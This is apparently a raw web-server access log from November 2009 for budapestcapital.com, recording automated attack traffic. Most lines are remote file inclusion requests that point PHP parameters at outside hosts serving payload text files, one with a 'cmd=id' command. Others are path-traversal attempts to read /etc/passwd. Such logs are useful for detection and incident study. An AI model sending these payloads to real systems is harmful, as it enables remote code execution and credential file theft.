222.122.46.179 - - [01/Nov/2009:10:23:13 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:23:26 -0800] "GET /logs/access_090329.log///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:23:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 3375 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:23:26 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:23:27 -0800] "GET /logs/access_090329.log///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:23:27 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:23:27 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 3375 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:26:08 -0800] "GET /logs/access_090329.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:26:20 -0800] "GET /logs/access_090329.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:31:35 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:31:35 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:31:35 -0800] "GET /logs/access.log/index/wp-content/plugins/Enigma2.php?boarddir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:31:38 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:31:40 -0800] "GET /homepage.php?sel=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:31:40 -0800] "GET /logs/homepage.php?sel=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:31:40 -0800] "GET /logs/access_090329.log/homepage.php?sel=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:31:46 -0800] "GET /logs/access_090329.log/index/wp-content/plugins/Enigma2.php?boarddir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.53.96.178 - - [01/Nov/2009:10:32:26 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.53.96.178 - - [01/Nov/2009:10:32:26 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.53.96.178 - - [01/Nov/2009:10:32:26 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:32:39 -0800] "GET /logs/access_090329.log/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:32:39 -0800] "GET /logs/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:32:39 -0800] "GET /index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:33:24 -0800] "GET /logs/access_090329.log%20%20/homepage.php?sel=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:34:14 -0800] "GET /logs/access_090401.log%20%20/homepage.php?sel=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.12.13.152 - - [01/Nov/2009:10:35:47 -0800] "GET /logs/access_090401.log//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.12.13.152 - - [01/Nov/2009:10:35:47 -0800] "GET /logs//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.12.13.152 - - [01/Nov/2009:10:35:52 -0800] "GET /main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.12.13.152 - - [01/Nov/2009:10:35:58 -0800] "GET /logs/access_090331.log//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:36:22 -0800] "GET /logs/access.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
94.236.23.242 - - [01/Nov/2009:10:36:22 -0800] "GET /logs/access_090329.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:37:02 -0800] "GET /logs/access_090329.log%20%20/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:10:38:18 -0800] "GET /logs/access_090329.log/index1.php?x=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:10:38:18 -0800] "GET /logs/index1.php?x=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:10:38:18 -0800] "GET /index1.php?x=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:40:00 -0800] "GET /logs/access_090329.log%20%20/index1.php?x=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:40:00 -0800] "GET /index1.php?x=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:40:00 -0800] "GET /logs/index1.php?x=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
204.3.182.177 - - [01/Nov/2009:10:42:43 -0800] "GET /index1.php?x=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
204.3.182.177 - - [01/Nov/2009:10:42:43 -0800] "GET /logs/index1.php?x=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
204.3.182.177 - - [01/Nov/2009:10:42:44 -0800] "GET /logs/access_090329.log/index1.php?x=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:44:46 -0800] "GET /logs/access_090329.log%20%20/home.php?x=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:44:46 -0800] "GET /logs/home.php?x=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:44:46 -0800] "GET /home.php?x=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:47:39 -0800] "GET /logs/access_090601.log/home.php?x=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:48:01 -0800] "GET /logs/access_090501.log/home.php?x=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:49:41 -0800] "GET /logs/access_090329.log/index1.php?x=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:10:50:19 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:10:50:19 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:10:50:20 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:10:53:48 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:10:53:48 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:53:56 -0800] "GET /index2.php?DoAction=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:53:56 -0800] "GET /logs/access.log%20%20/index2.php?DoAction=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:53:56 -0800] "GET /logs/index2.php?DoAction=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
72.11.145.8 - - [01/Nov/2009:10:53:56 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
88.231.154.183 - - [01/Nov/2009:10:54:02 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sntv.it/tool20.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:55:34 -0800] "GET /logs/access.log/index2.php?DoAction=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:56:50 -0800] "GET /logs/access.log%20%20/index2.php?url_page=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:56:50 -0800] "GET /logs/index2.php?url_page=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:56:50 -0800] "GET /index2.php?url_page=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:56:50 -0800] "GET /logs/access_090329.log%20%20/index2.php?url_page=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:56:52 -0800] "GET /index1.php?choix=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:56:52 -0800] "GET /logs/access_090329.log/index1.php?choix=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:56:52 -0800] "GET /logs/index1.php?choix=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:56:59 -0800] "GET /index1.php?choix=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:56:59 -0800] "GET /logs/index1.php?choix=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.139.67.116 - - [01/Nov/2009:10:56:59 -0800] "GET /logs/access_090329.log%20%20/index1.php?choix=http://www.dantzigphotography.com/wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:57:14 -0800] "GET /index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:57:14 -0800] "GET /logs/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:57:15 -0800] "GET /logs/access_090329.log/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:57:20 -0800] "GET /logs/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:57:20 -0800] "GET /index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:57:20 -0800] "GET /logs/access_090329.log/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
204.3.182.177 - - [01/Nov/2009:10:57:38 -0800] "GET /logs/access_090329.log/index1.php?choix=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
204.3.182.177 - - [01/Nov/2009:10:57:38 -0800] "GET /logs/index1.php?choix=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:10:58:47 -0800] "GET /logs/index1.php?choix=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:10:58:47 -0800] "GET /logs/access_090329.log/index1.php?choix=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.94.33.242 - - [01/Nov/2009:10:58:47 -0800] "GET /index1.php?choix=http://www.dantzigphotography.com//wp-content/plugins/mygallery/myfunctions/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:59:10 -0800] "GET /logs/access_090401.log%20%20/index2.php?ascii_seite=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:59:10 -0800] "GET /index2.php?ascii_seite=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [01/Nov/2009:10:59:10 -0800] "GET /logs/index2.php?ascii_seite=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:59:22 -0800] "GET /logs/access_090329.log%20%20/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:10:59:29 -0800] "GET /logs/access_090329.log%20%20/index1.php?choix=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:05:07 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:05:10 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:05:39 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:05:47 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:47 -0800] "GET /logs/access_090329.log%20/main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:47 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:47 -0800] "GET /logs/access_090329.log%20/main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:47 -0800] "GET /logs/main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:47 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:48 -0800] "GET /logs/main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:58 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:58 -0800] "GET /logs/main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:07:58 -0800] "GET /logs/access_090329.log%20/main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:08:07 -0800] "GET /logs/main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:08:07 -0800] "GET /logs/access_090329.log%20/main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "-" "www.budapestcapital.com"
91.121.28.22 - - [01/Nov/2009:11:08:07 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "-" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:29 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:29 -0800] "GET /logs/access_090329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:30 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:37 -0800] "GET /logs/access_090329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:38 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:38 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:53 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:53 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [01/Nov/2009:11:11:53 -0800] "GET /logs/access_090329.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:11:12:55 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:11:12:55 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [01/Nov/2009:11:12:55 -0800] "GET /logs/access_090329.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
